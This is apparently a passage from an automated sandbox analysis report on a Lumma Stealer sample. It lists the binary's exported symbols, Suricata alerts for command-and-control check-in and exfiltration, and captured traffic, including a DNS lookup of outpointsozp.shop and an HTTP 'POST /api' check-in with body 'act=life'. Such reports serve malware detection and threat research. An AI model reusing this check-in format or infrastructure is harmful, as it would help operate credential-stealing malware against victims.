              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@QAE@XZ@4HA68750x59edcc
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAE@XZ@4HA68760x59ee64
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingImageDownloaded@@QAE@XZ@4HA68770x59eb60
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingParamChanged@@QAE@XZ@4HA68780x59eda4
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAE@XZ@4HA68790x59eaac
              ?s_firsttime@?1???0CSBMBMessage_NotifyNetworkStateChanged@@QAE@XZ@4HA68800x59ec74
              ?s_firsttime@?1???0CSBMBMessage_NotifyNetworkSwitch@@QAE@XZ@4HA68810x59ebf8
              ?s_firsttime@?1???0CSBMBMessage_NotifyOpenDialPad@@QAE@XZ@4HA68820x59ecac
              ?s_firsttime@?1???0CSBMBMessage_NotifyOpenUrlWithAuth@@QAE@XZ@4HA68830x59ed14
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTAddContact@@QAE@XZ@4HA68840x59ee80
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTCallPeer@@QAE@XZ@4HA68850x59eeec
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTCleanIDPToken@@QAE@XZ@4HA68860x59eef8
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTDeviceInfo@@QAE@XZ@4HA68870x59ea80
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTFeedbackInfo@@QAE@XZ@4HA68880x59eb98
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTLoginInfo@@QAE@XZ@4HA68890x59ef5c
              ?s_firsttime@?1???0CSBMBMessage_NotifyReceivedSelectMe@@QAE@XZ@4HA68900x59ede8
              ?s_firsttime@?1???0CSBMBMessage_NotifyRunningLate@@QAE@XZ@4HA68910x59ef50
              ?s_firsttime@?1???0CSBMBMessage_NotifySaveChat@@QAE@XZ@4HA68920x59efc4
              ?s_firsttime@?1???0CSBMBMessage_NotifySaveFileInMeetingChat@@QAE@XZ@4HA68930x59ea40
              ?s_firsttime@?1???0CSBMBMessage_NotifyShareFileInMeetingChat@@QAE@XZ@4HA68940x59ecc4
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartAppShare@@QAE@XZ@4HA68950x59ef18
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartDocsShare@@QAE@XZ@4HA68960x59ebfc
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartLogin@@QAE@XZ@4HA68970x59ed6c
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartRecording@@QAE@XZ@4HA68980x59ea0c
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartSetting@@QAE@XZ@4HA68990x59ea68
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartWhiteboardShare@@QAE@XZ@4HA69000x59eddc
              ?s_firsttime@?1???0CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAE@XZ@4HA69010x59edec
              ?s_firsttime@?1???0CSBMBMessage_NotifyUpgradeAccount@@QAE@XZ@4HA69020x59ea74
              ?s_firsttime@?1???0CSBMBMessage_NotifyUserInputProxyAuth@@QAE@XZ@4HA69030x59ea90
              ?s_firsttime@?1???0CSBMBMessage_NotifyUserPropertiesChanged@@QAE@XZ@4HA69040x59ec24
              ?s_firsttime@?1???0CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAE@XZ@4HA69050x59f000
              ?s_firsttime@?1???0CSBMBMessage_Notify_PT_Process_PID@@QAE@XZ@4HA69060x59eed4
              ?s_firsttime@?1???0CSBMBMessage_Notify_ZPNS_MeetingStart@@QAE@XZ@4HA69070x59eea4
              ?s_firsttime@?1???0CSBMBMessage_OnZPFeatureNotification@@QAE@XZ@4HA69080x59ec5c
              ?s_firsttime@?1???0CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAE@XZ@4HA69090x59ee40
              ?s_firsttime@?1???0CSBMBMessage_OpenLoginPanelForGuest@@QAE@XZ@4HA69100x59ed10
              ?s_firsttime@?1???0CSBMBMessage_OperateAudioFacilityParam@@QAE@XZ@4HA69110x59eb70
              ?s_firsttime@?1???0CSBMBMessage_OperateChatFacilityParam@@QAE@XZ@4HA69120x59eebc
              ?s_firsttime@?1???0CSBMBMessage_OperateScreenShareFacilityParam@@QAE@XZ@4HA69130x59ef60
              ?s_firsttime@?1???0CSBMBMessage_OperateVideoFacilityParam@@QAE@XZ@4HA69140x59eb80
              ?s_firsttime@?1???0CSBMBMessage_OutlookGetMAPICalendarEvents@@QAE@XZ@4HA69150x59ea00
              ?s_firsttime@?1???0CSBMBMessage_OutlookMAPIEventChangeNotify@@QAE@XZ@4HA69160x59e9f8
              ?s_firsttime@?1???0CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAE@XZ@4HA69170x59e9fc
              ?s_firsttime@?1???0CSBMBMessage_OutlookOnGetMAPICalendarEventsNotify@@QAE@XZ@4HA69180x59e9f4
              ?s_firsttime@?1???0CSBMBMessage_OutlookRequest@@QAE@XZ@4HA69190x59ed0c
              ?s_firsttime@?1???0CSBMBMessage_OutlookResponse@@QAE@XZ@4HA69200x59edc0
              ?s_firsttime@?1???0CSBMBMessage_OutlookStartMeetingRequest@@QAE@XZ@4HA69210x59eaf4
              ?s_firsttime@?1???0CSBMBMessage_OutlookStartMeetingResponse@@QAE@XZ@4HA69220x59ef8c
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Request@@QAE@XZ@4HA69230x59ee2c
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAE@XZ@4HA69240x59eefc
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAE@XZ@4HA69250x59f008
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_SelfEmail_Response@@QAE@XZ@4HA69260x59ee48
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAE@XZ@4HA69270x59ec20
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_StartChat_Request@@QAE@XZ@4HA69280x59edf0
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_StartVideo_Request@@QAE@XZ@4HA69290x59eda0
              ?s_firsttime@?1???0CSBMBMessage_PMCCheckInTeamChatReq@@QAE@XZ@4HA69300x59ed1c
              ?s_firsttime@?1???0CSBMBMessage_PMCCheckInTeamChatRsp@@QAE@XZ@4HA69310x59ef88
              ?s_firsttime@?1???0CSBMBMessage_PMCMeetChatMsgDeepLinkReq@@QAE@XZ@4HA69320x59ed40
              ?s_firsttime@?1???0CSBMBMessage_PMCMeetChatMsgReaded@@QAE@XZ@4HA69330x59eff0
              ?s_firsttime@?1???0CSBMBMessage_PMCMeetingEnded@@QAE@XZ@4HA69340x59ef10
              ?s_firsttime@?1???0CSBMBMessage_PMCOpenTeamChatReq@@QAE@XZ@4HA69350x59ea5c
              ?s_firsttime@?1???0CSBMBMessage_PMCOpenTeamChatRsp@@QAE@XZ@4HA69360x59ed54
              ?s_firsttime@?1???0CSBMBMessage_PMCQueryDefaultGiphyReq@@QAE@XZ@4HA69370x59ebe4
              ?s_firsttime@?1???0CSBMBMessage_PMCQueryDefaultGiphyRsp@@QAE@XZ@4HA69380x59ee1c
              ?s_firsttime@?1???0CSBMBMessage_PMCTeamChatUpdated@@QAE@XZ@4HA69390x59ea3c
              ?s_firsttime@?1???0CSBMBMessage_PSCancelDownloadComponent@@QAE@XZ@4HA69400x59ec80
              ?s_firsttime@?1???0CSBMBMessage_PSComponentDownloadProgress@@QAE@XZ@4HA69410x59ef20
              ?s_firsttime@?1???0CSBMBMessage_PSComponentDownloadResult@@QAE@XZ@4HA69420x59eae0
              ?s_firsttime@?1???0CSBMBMessage_PSPTCustomMessage@@QAE@XZ@4HA69430x59eb64
              ?s_firsttime@?1???0CSBMBMessage_PSPTNotify3DAvatarEnable@@QAE@XZ@4HA69440x59edb8
              ?s_firsttime@?1???0CSBMBMessage_PSQueryComponentExist@@QAE@XZ@4HA69450x59ed74
              ?s_firsttime@?1???0CSBMBMessage_PSQueryComponentExistResult@@QAE@XZ@4HA69460x59ec48
              ?s_firsttime@?1???0CSBMBMessage_PSStartDownloadComponent@@QAE@XZ@4HA69470x59ede0
              ?s_firsttime@?1???0CSBMBMessage_PS_PSAsyncRecordingUploadResult@@QAE@XZ@4HA69480x59ee28
              ?s_firsttime@?1???0CSBMBMessage_PS_PSResponseToTerm@@QAE@XZ@4HA69490x59ee34
              ?s_firsttime@?1???0CSBMBMessage_PS_PTRequestActiveAppEx@@QAE@XZ@4HA69500x59eb7c
              ?s_firsttime@?1???0CSBMBMessage_PS_PTRequestToTerm@@QAE@XZ@4HA69510x59ed04
              ?s_firsttime@?1???0CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@QAE@XZ@4HA69520x59ebf4
              ?s_firsttime@?1???0CSBMBMessage_PS_UpdateAccountInfo@@QAE@XZ@4HA69530x59ea98
              ?s_firsttime@?1???0CSBMBMessage_PS_UpdateKeyValueInfo@@QAE@XZ@4HA69540x59ed34
              ?s_firsttime@?1???0CSBMBMessage_PairRelationTokenRequest@@QAE@XZ@4HA69550x59ebe8
              ?s_firsttime@?1???0CSBMBMessage_PairRelationTokenResponse@@QAE@XZ@4HA69560x59ef00
              ?s_firsttime@?1???0CSBMBMessage_PolicyUpdated@@QAE@XZ@4HA69570x59eba8
              ?s_firsttime@?1???0CSBMBMessage_PromptProxyAuth@@QAE@XZ@4HA69580x59eb1c
              ?s_firsttime@?1???0CSBMBMessage_RealNameAuthInfo@@QAE@XZ@4HA69590x59efc0
              ?s_firsttime@?1???0CSBMBMessage_RecaptchaRequest@@QAE@XZ@4HA69600x59ee88
              ?s_firsttime@?1???0CSBMBMessage_RemoveCustom3DAvatarToWeb@@QAE@XZ@4HA69610x59efa0
              ?s_firsttime@?1???0CSBMBMessage_RemoveFromCameraControlGroup@@QAE@XZ@4HA69620x59ecb0
              ?s_firsttime@?1???0CSBMBMessage_ReportIssue@@QAE@XZ@4HA69630x59ee4c
              ?s_firsttime@?1???0CSBMBMessage_RequestMyIDPToken@@QAE@XZ@4HA69640x59ed24
              ?s_firsttime@?1???0CSBMBMessage_RequestUpdateAICAdminSetting@@QAE@XZ@4HA69650x59eb68
              ?s_firsttime@?1???0CSBMBMessage_SaveCustom3DAvatarToWeb@@QAE@XZ@4HA69660x59eed0
              ?s_firsttime@?1???0CSBMBMessage_SettingUpdated@@QAE@XZ@4HA69670x59efb0
              ?s_firsttime@?1???0CSBMBMessage_ShareMeetingChatReq@@QAE@XZ@4HA69680x59ede4
              ?s_firsttime@?1???0CSBMBMessage_ShareMeetingChatRsp@@QAE@XZ@4HA69690x59ef2c
              ?s_firsttime@?1???0CSBMBMessage_StartCallOutInfo@@QAE@XZ@4HA69700x59ee44
              ?s_firsttime@?1???0CSBMBMessage_StartDownloadComponent@@QAE@XZ@4HA69710x59ed2c
              ?s_firsttime@?1???0CSBMBMessage_StartMeetingWithHostKey@@QAE@XZ@4HA69720x59ea24
              ?s_firsttime@?1???0CSBMBMessage_SubscribePresenceExpire@@QAE@XZ@4HA69730x59ea4c
              ?s_firsttime@?1???0CSBMBMessage_TermConf@@QAE@XZ@4HA69740x59eab0
              ?s_firsttime@?1???0CSBMBMessage_TermThread@@QAE@XZ@4HA69750x59ed48
              ?s_firsttime@?1???0CSBMBMessage_TrackingPAAPEvent@@QAE@XZ@4HA69760x59ec78
              ?s_firsttime@?1???0CSBMBMessage_UpdateCallSessionSummaryResponse@@QAE@XZ@4HA69770x59edfc
              ?s_firsttime@?1???0CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAE@XZ@4HA69780x59ee84
              ?s_firsttime@?1???0CSBMBMessage_UpdateFeatureToggle@@QAE@XZ@4HA69790x59ed08
              ?s_firsttime@?1???0CSBMBMessage_UpdateKeyValueInfo@@QAE@XZ@4HA69800x59ee3c
              ?s_firsttime@?1???0CSBMBMessage_UpdateLaunchConfParam@@QAE@XZ@4HA69810x59eea0
              ?s_firsttime@?1???0CSBMBMessage_UpdateOpFlags@@QAE@XZ@4HA69820x59ea6c
              ?s_firsttime@?1???0CSBMBMessage_UpdateRegisterServer@@QAE@XZ@4HA69830x59eff8
              ?s_firsttime@?1???0CSBMBMessage_UploadExceptionMemoryLog@@QAE@XZ@4HA69840x59eb50
              ?s_firsttime@?1???0CSBMBMessage_UploadFeedback@@QAE@XZ@4HA69850x59ec54
              ?s_firsttime@?1???0CSBMBMessage_UploadPbxRealTimeMonitorLog@@QAE@XZ@4HA69860x59ef24
              ?s_firsttime@?1???0CSBMBMessage_UserInTrustListInfo@@QAE@XZ@4HA69870x59eb94
              ?s_firsttime@?1???0CSBMBMessage_UserUpdateName@@QAE@XZ@4HA69880x59eeb4
              ?s_firsttime@?1???0CSBMBMessage_UserUploadPicture@@QAE@XZ@4HA69890x59edc4
              ?s_firsttime@?1???0CSBMBMessage_VCardDataRequest@@QAE@XZ@4HA69900x59eff4
              ?s_firsttime@?1???0CSBMBMessage_VCardDataResponse@@QAE@XZ@4HA69910x59ec04
              ?s_firsttime@?1???0CSBMBMessage_VCardFetchManagerInfo@@QAE@XZ@4HA69920x59eb88
              ?s_firsttime@?1???0CSBMBMessage_VCardSetBuddyStar@@QAE@XZ@4HA69930x59ec98
              ?s_firsttime@?1???0CSBMBMessage_VDIPluginPublicIP@@QAE@XZ@4HA69940x59ed8c
              ?s_firsttime@?1???0CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAE@XZ@4HA69950x59efb4
              ?s_firsttime@?1???0CSBMBMessage_VDI_DiagLog_Content@@QAE@XZ@4HA69960x59ebac
              ?s_firsttime@?1???0CSBMBMessage_VDI_Plugin_Info@@QAE@XZ@4HA69970x59ec1c
              ?s_firsttime@?1???0CSBMBMessage_VTLSBypassFromWeb@@QAE@XZ@4HA69980x59ee08
              ?s_firsttime@?1???0CSBMBMessage_VTLSConfirm@@QAE@XZ@4HA69990x59eb74
              ?s_firsttime@?1???0CSBMBMessage_VTLSPrompt@@QAE@XZ@4HA70000x59f00c
              ?s_firsttime@?1???0CSBMBMessage_WEBCLIENT_SEND_TO_ZR@@QAE@XZ@4HA70010x59ef44
              ?s_firsttime@?1???0CSBMBMessage_ZR_SEND_TO_WEBCLIENT@@QAE@XZ@4HA70020x59ee0c
              ?s_firsttime@?1???0CSBMBMessage_ZoomInternalNavigateURLEvent@@QAE@XZ@4HA70030x59ed44
              ?s_firsttime@?1???0CSBMBMessage_ZpnsUpdateHuddlesSettings@@QAE@XZ@4HA70040x59ed4c
              ?s_firsttime@?1???0CSBMessage_Assistant_AudioDeviceUpdateNotification@@QAE@XZ@4HA70050x59ed84
              ?s_firsttime@?1???0CSBMessage_Assistant_AudioQualityNotification@@QAE@XZ@4HA70060x59ef08
              ?s_firsttime@?1???0SBIPCMessage_Connect@@QAE@XZ@4HA70070x59f024
              ?s_firsttime@?1???0SBIPCMessage_ConnectResponse@@QAE@XZ@4HA70080x59f01c
              ?s_firsttime@?1???0SBIPCMessage_DisConnect@@QAE@XZ@4HA70090x59f020
              ?set@StringPiece@Cmm@@QAEXPBD@Z70100x411120
              ?set@StringPiece@Cmm@@QAEXPBDI@Z70110x411100
              ?set@StringPiece@Cmm@@QAEXPBXI@Z70120x411100
              ?set_listener@Channel@ssb_ipc@@QAEXPAVListener@12@@Z70130x45cb50
              ?size@?$CStringT@D@Cmm@@QBEIXZ70140x403ad0
              ?size@?$CStringT@_W@Cmm@@QBEIXZ70150x403ad0
              ?size@DictionaryValue@@QBEIXZ70160x44bcc0
              ?size@StringPiece@Cmm@@QBEIXZ70170x40c640
              ?stack_timecost_threashold_@CCmmPerfTelemetry@@0KA70180x59f080
              ?starts_with@StringPiece@Cmm@@QBE_NABV12@@Z70190x4111f0
              ?stepping@CPU@Cmm@@QBEHXZ70200x44bcc0
              ?stream@LogMessage@logging@@QAEAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@XZ70210x44bb90
              ?substr@?$CStringT@D@Cmm@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@II@Z70220x4066b0
              ?substr@?$CStringT@_W@Cmm@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z70230x404890
              ?substr@StringPiece@Cmm@@QBE?AV12@II@Z70240x45a4c0
              ?swap@?$CStringT@D@Cmm@@QAEXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z70250x404710
              ?swap@?$CStringT@_W@Cmm@@QAEXAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z70260x404710
              ?threadTelemetryMap_@CCmmPerfTelemetry@@0V?$unordered_map@Vid@thread@std@@V?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@3@U?$hash@Vid@thread@std@@@3@U?$equal_to@Vid@thread@std@@@3@V?$allocator@U?$pair@$$CBVid@thread@std@@V?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@3@@std@@@3@@std@@A70270x5afaf8
              ?thread_proc_@CCmmPerfTelemetry@@0VCCmmPerfTelemetryThreadProc@@A70280x59f0c0
              ?type@CPU@Cmm@@QBEHXZ70290x40c630
              ?unique_id_@CCmmPerfTelemetry@@0V?$unordered_map@V?$CStringT@_W@Cmm@@V12@U?$hash@V?$CStringT@_W@Cmm@@@std@@U?$equal_to@V?$CStringT@_W@Cmm@@@4@V?$allocator@U?$pair@$$CBV?$CStringT@_W@Cmm@@V12@@std@@@4@@std@@A70300x5afabc
              ?utf8Value@FilePath@Cmm@@QBE?AV?$CStringT@D@2@XZ70310x411360
              ?value@FilePath@Cmm@@QBEABV?$CStringT@_W@2@XZ70320x411350
              ?vendor_name@CPU@Cmm@@QBEABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ70330x44bcb0
              ?wordmemcmp@StringPiece@Cmm@@SAHPBD0I@Z70340x4112b0
              ?work_thread_@CCmmPerfTelemetry@@0VCThread@Cmm@@A70350x5afb18
              ?writeBoolFalse@XMLUtil@tinyxml2@@0PBDB70360x59f028
              ?writeBoolTrue@XMLUtil@tinyxml2@@0PBDB70370x59f02c
              CmmMQ_GetService70380x46dd10
              CmmMQ_InitService70390x402d00
              CmmMQ_TermService70400x402d00
              cmm_astr_chri70410x4132c0
              cmm_astr_lwr70420x413540
              cmm_astr_ncat70430x413c10
              cmm_astr_ncpy70440x413bb0
              cmm_astr_rchri70450x413320
              cmm_astr_rstri70460x413400
              cmm_astr_stri70470x4133c0
              cmm_astr_upr70480x4134d0
              cmm_fs_find_first70490x413070
              cmm_fs_search70500x413290
              cmm_fs_write70510x413010
              cmm_wstr_chri70520x4132f0
              cmm_wstr_lwr70530x413570
              cmm_wstr_ncat70540x413c50
              cmm_wstr_ncpy70550x413be0
              cmm_wstr_rchri70560x413370
              cmm_wstr_rstri70570x413460
              cmm_wstr_stri70580x4133e0
              cmm_wstr_upr70590x413500
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 2024-07-27T11:25:08.531260+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49733 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:13.089587+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:05.948522+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49731 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:14.578751+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49737 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:17.261560+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49738 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:19.539733+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49739 | 13.85.23.86 | 192.168.2.4 |
| 2024-07-27T11:25:09.041971+0200 | TCP | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 49733 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:57.781939+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49745 | 13.85.23.86 | 192.168.2.4 |
| 2024-07-27T11:25:06.794685+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 49731 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:10.219474+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49734 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:05.275348+0200 | UDP | 2054592 | ET MALWARE Lumma Stealer Domain in DNS Lookup (outpointsozp .shop) | 54782 | 53 | 192.168.2.4 | 1.1.1.1 |
| 2024-07-27T11:25:07.307893+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49732 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:11.033471+0200 | TCP | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 49734 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:07.786991+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 49732 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:11.748222+0200 | TCP | 2054603 | ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop) | 49735 | 443 | 192.168.2.4 | 188.114.97.3 |
| 2024-07-27T11:25:13.537183+0200 | TCP | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
              Jul 27, 2024 11:25:13.537395000 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:13.537481070 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.111745119 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.111794949 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.111881971 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.112258911 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.112281084 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.578583956 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.578751087 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.579834938 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.579888105 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.580122948 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.581213951 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.581895113 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.581976891 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582128048 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.582178116 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582356930 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.582422972 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582643032 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.582714081 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582952976 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583019018 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583300114 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583350897 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583374023 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583408117 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583626032 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583678961 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583722115 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583818913 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583888054 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.592782974 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.593242884 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.593334913 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.593403101 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.593463898 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.593563080 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.597615004 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.891309023 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.891381025 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.891621113 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.891762018 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.933255911 CEST49738443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.933299065 CEST44349738188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.937639952 CEST49738443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.937639952 CEST49738443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.937684059 CEST44349738188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:17.261559963 CEST49738443192.168.2.4188.114.97.3
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 27, 2024 11:25:05.275347948 CEST | 54782 | 53 | 192.168.2.4 | 1.1.1.1
              Jul 27, 2024 11:25:05.293972015 CEST | 53 | 54782 | 1.1.1.1 | 192.168.2.4
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Jul 27, 2024 11:25:05.275347948 CEST | 192.168.2.4 | 1.1.1.1 | 0x7bae | Standard query (0) | outpointsozp.shop | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Jul 27, 2024 11:25:05.293972015 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bae | No error (0) | outpointsozp.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
              Jul 27, 2024 11:25:05.293972015 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bae | No error (0) | outpointsozp.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
              • outpointsozp.shop
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | 6820 | C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:25:06 UTC | 264 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 8
              Host: outpointsozp.shop
              2024-07-27 09:25:06 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
              Data Ascii: act=life
              2024-07-27 09:25:06 UTC | 800 | IN | HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:06 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=pgumu3v13r29g7vmieb64e41lh; expires=Wed, 20-Nov-2024 03:11:45 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYTvxylynX9BEupJV%2BtLnLtTjTD8liAvj75EQDt0HylbJmfyWvuikr46dbJzcBlbpMW6GSDmhnmWZrgo50Sejg7B6fZmtV0h62o5CGQ7EjQUKS3fI2xMDMHOnC1INN2sRiST0A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94899b800f73-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:06 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
              Data Ascii: 2ok
              2024-07-27 09:25:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
